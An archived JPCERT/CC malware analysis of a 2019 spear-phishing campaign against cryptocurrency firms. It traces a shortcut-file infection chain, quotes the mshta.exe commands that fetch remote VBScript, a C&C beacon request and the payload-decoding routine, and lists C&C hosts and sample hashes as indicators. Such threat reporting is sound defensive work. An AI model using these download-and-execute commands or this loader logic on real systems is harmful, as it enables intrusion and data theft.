{
	"id": "b651fb9c-d613-45bc-bf80-9b16c9ac6dd1",
	"created_at": "2026-04-06T00:12:24.788039Z",
	"updated_at": "2026-04-10T03:20:47.034504Z",
	"deleted_at": null,
	"sha1_hash": "ba1c4911dca547ebb72d117976003c062d17a96e",
	"title": "Spear Phishing against Cryptocurrency Businesses - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 596763,
	"plain_text": "Spear Phishing against Cryptocurrency Businesses - JPCERT/CC\r\nEyes\r\nBy JPCERT/CC\r\nPublished: 2019-07-08 · Archived: 2026-04-05 21:07:59 UTC\r\nAs of June 2019, JPCERT/CC has observed targeted emails to some Japanese organisations. These emails contain\r\na URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file.\r\nThis article will describe the details of the attack method.\r\nHow the VBScript downloader is launched\r\nThe zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut\r\nfile “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The\r\nbelow image illustrates the flow of events from the shortcut file being executed until the VBScript-based\r\ndownloader is launched.\r\nFigure 1： Flow of events from running the shortcut file to infecting a host\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 1 of 8\n\nThe shortcut file contains the following command:\r\nC:\\Windows\\System32\\mshta.exe https://bit.ly/31O88c3\r\nWhen a user accesses the shortened URL, they will be redirected to the following site, and an HTML file\r\ncontaining the VBScript (Figure 2) is downloaded.\r\nhttp://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D\r\nFigure 2： HTML file downloaded by the shortcut file\r\nThe behaviour of the VBScript is described in Figure 3. First, it creates and displays a text file that contains the\r\npassword for the decoy document. Then, it creates a VBS file (oezjrjua.vbs) in %TEMP% directory and executes\r\nit. It also lists the processes running in the environment and checks whether any of them contains specific strings\r\n(\"hudongf\" or \"qhsafe\"). If these are not included, then a shortcut file (xBoxOne.lnk) is created in the Startup\r\nfolder. It is assumed that this process is meant to check strings that Qihoo 360 security products contain\r\n(zhudongfangyu.exe, qhsafemain.exe).\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 2 of 8\n\nFigure 3： Behaviour of VBScript in the HTML file\r\nDetails of xBoxOne.lnk\r\nxBoxOne.lnk is a shortcut file and contains the following command:\r\nC:\\Windows\\System32\\mshta.exe https://bit.ly/2SGs76y\r\nWhen a user accesses the shortened URL, they will be redirected to the following site:\r\nhttp://update.gdrives.top:8080/open?id=b7hMO0D%2ByNbNZSqXu4Putub%2BZLLqg/S66Foz0YKUjety914cQmWz32MV6B\r\nThis shortcut file is created in the Startup folder and executed when the login is processed. As of 26 June 2019,\r\nJPCERT/CC was not able to confirm the details of the site as the hostname could not be resolved.\r\nDetails of oezjrjua.vbs\r\noezjrjua.vbs is a downloader which sends a POST request every 3 minutes and executes the received data as\r\nVBScript. The following is an example.\r\nPOST /open?topics=s9[random 3-digit numeric]\r\nHTTP/1.1\r\nAccept: */*\r\nAccept-Language: ja\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 3 of 8\n\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .N\r\nHost: 75.133.9.84:8080\r\nContent-Length: 7426\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n200\r\nDetails of VBScript downloaded by oezjrjua.vbs\r\nJPCERT/CC has confirmed that the VBScript (Figure 4) is received and executed in response to the POST request\r\nfrom oezjrjua.vbs.\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 4 of 8\n\nFigure 4：VBScript executed by oezjrjua.vbs (snipped)\r\nThe executed VBScript collects information of the infected device and sends it to the attacker’s server every\r\nminute. The following information is sent:\r\nUsername\r\nHost name\r\nOS version\r\nOS install date\r\nOS run time\r\nTime zone\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 5 of 8\n\nCPU name\r\nExecution path of oezjrjua.vbs\r\nNetwork adapter information\r\nList of running processes\r\nIf the response to the data contains “20”, encoded data will be downloaded. It can be decoded with the following\r\ncodes:\r\nn=InStr(1,res,\"#\") // Finds # in the response\r\nkey=CLng(\"\u0026h\" \u0026 Mid(res,1,n-1)) // Extract the key\r\npsc=Mid(ret,n+1,Len(res)-n) // Extracts encoded data\r\nsc=base64dec(psc) // Base64 decoding (1st time)\r\npsc=CStr(xor(sc,key)) // XOR processing on the key\r\nNStep=base64dec(psc) // Base64 decoding (2nd time)\r\nThe decoded data is expected to be VBScript, and it will be executed when it is correctly decoded. As of now, we\r\nhave no clue about what kind of malware will be downloaded as a result since the encoded data is not accessible.\r\nIt is assumed that attackers would inject some malicious files according to the victim’s environmental information\r\n.\r\nAccess to the shortened URL\r\nJPCERT/CC observed a limited number of access to the shortened URL (Figure 5). This implies that the attack\r\nwas conducted against a very limited range of targets.\r\nFigure 5： Access counts to the shortened URL (snipped)\r\nIn closing\r\nIn this series of attacks, we have observed that attackers change some parts of encoding and conditions for each\r\nattempt. It is likely that this type of attack continues with some customisation. Details about the shortcut file is\r\navailable in Appendix A, list of samples in Appendix B and C\u0026C servers in Appendix C.\r\nThe hash values and C\u0026C servers of some variants are listed in Appendix D and E . Please make sure that none of\r\nyour devices is communicating to the C\u0026C servers listed in Appendix C or E. These samples were mostly decoy\r\ndocuments with subjects about cryptocurrency. We are aware that some of these documents have been sent to\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 6 of 8\n\norganisations that are related to cryptocurrencies. We assume that this attack campaign specifically targets\r\ncryptocurrency operators and related entities.\r\nTomoaki Tani\r\n(Translated by Yukako Uchida)\r\nAppendix A Shortcut file information\r\nTable 1: Information contained in the shortcut file 1\r\nDrive serial number fe42-66e0\r\nNetBIOS name desktop-6hpdfg4\r\nMAC address 94:b8:6d:42:68:1d\r\nTable 2: Information contained in the shortcut file 2\r\nDrive serial number 1aee-e0bd\r\nNetBIOS name desktop-m9r59ro\r\nMAC address 74:27:ea:25:d6:11\r\nAppendix B SHA-256 Hash value of the samples\r\n71346d2cb7ecf45d7fe221ede76da51a2ecb85110b9b27f1cb64c30f9af69250\r\n01b5cd525d18e28177924d8a7805c2010de6842b8ef430f29ed32b3e5d7d99a0\r\n10ce173cfe83321b44139e3d7d20c5ac1a9c1c99882387af0fdbadcfa2597651\r\ndc5f81c5bf0f5905ff2b6bdc4e1171fc41ad736da265801a64bb821bd76eace9\r\n9ad472872ba20c66fad56b7340ae869ff4d6708a2d0fc275a0faaded6ab7b507\r\nde7fde10fabf91c03cdd894e40a19e664a9f9866932a801e57f1b79088847ebd\r\n4ecab0f81a2da70df5f2260bab7c8c130b200dbfe2bbd8e3d1845ff0c93c7861\r\ne982a70cb21c915d847925bd364d6d87f02eac135eac3ba80ad448700e1ae9a7\r\nAppendix C List of C\u0026C servers\r\nservice.amzonnews.club\r\n75.133.9.84\r\nupdate.gdrives.top\r\ngoogledrive.network\r\nAppendix D SHA-256 Hash value of the similar samples\r\n901eca85c5711a53e53c48309b3afd34cbb014c91a20f8f716ee21832c7cd5e0\r\nc60aedbb20fdea048fa2d4b3bdc520f9f9b9172ee16c01dac19b33781b1bdb1d\r\n7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 7 of 8\n\n1533374acf886bc3015c4cba3da1c67e67111c22d00a8bbf7694c5394b91b9fc\r\nb077edc8d08796cdff8b75e5cb66e0191510a559941b431e38040e51b6607876\r\n997c4f7695a6a615da069d5f839582fdb83f215bc999e8af492636b2b5e3436c\r\na464781b616c86bbd68dbf909826444f7fd6c6ae378caf074926df7aebc4e3a1\r\nUpdate: Nov 20, 2019\r\n122674a261ac7061c8a304f3e4a1fb13023f39102e5605e30f7aad0ab388dfa0\r\n57278dab6a0e8438444996503a6528ff8a816be0060d5e5db7a6ab1a0d6122f1\r\n9b20767b11f7e54644104d455aa25c6a0fc99ce9d7b39b98408f8687209585e2\r\nd70988e43ebc4981e880489b11b6c374d466ef04803f9c2e084af037049cfd04\r\nf9e299c562195513968be88c6096957494cf15195a05c4abc907520eff872332\r\n7dcbeb1806296739acfa5819872e8d9669a9c60be1fc96be9cb73ca519917ae8\r\nAppendix E C\u0026C servers of the similar samples\r\ndrverify.dns-cloud.net\r\ndocs.googlefiledrive.com\r\neuropasec.dnsabr.com\r\neu.euprotect.net\r\n092jb_378v3_1.googldocs.org\r\ngbackup.gogleshare.xyz\r\ndrive.gogleshare.xyz\r\nUpdate: Nov 20, 2019\r\ndown.financialmarketing.live\r\ndrivegoogle.publicvm.com\r\ngoogledrive.publicvm.com\r\nmskpupdate.publicvm.com\r\ngoogledrive.email\r\niellsfileshare.sharedrivegght.xyz\r\ndownload.showprice.xyz\r\ndowns.showprice.xyz\r\nmdown.showprice.xyz\r\nstart.showprice.xyz\r\nu13580130.ct.sendgrid.net\r\nSource: https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html"
	],
	"report_names": [
		"spear-phishing-against-cryptocurrency-businesses.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434344,
	"ts_updated_at": 1775791247,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ba1c4911dca547ebb72d117976003c062d17a96e.pdf",
		"text": "https://archive.orkl.eu/ba1c4911dca547ebb72d117976003c062d17a96e.txt",
		"img": "https://archive.orkl.eu/ba1c4911dca547ebb72d117976003c062d17a96e.jpg"
	}
}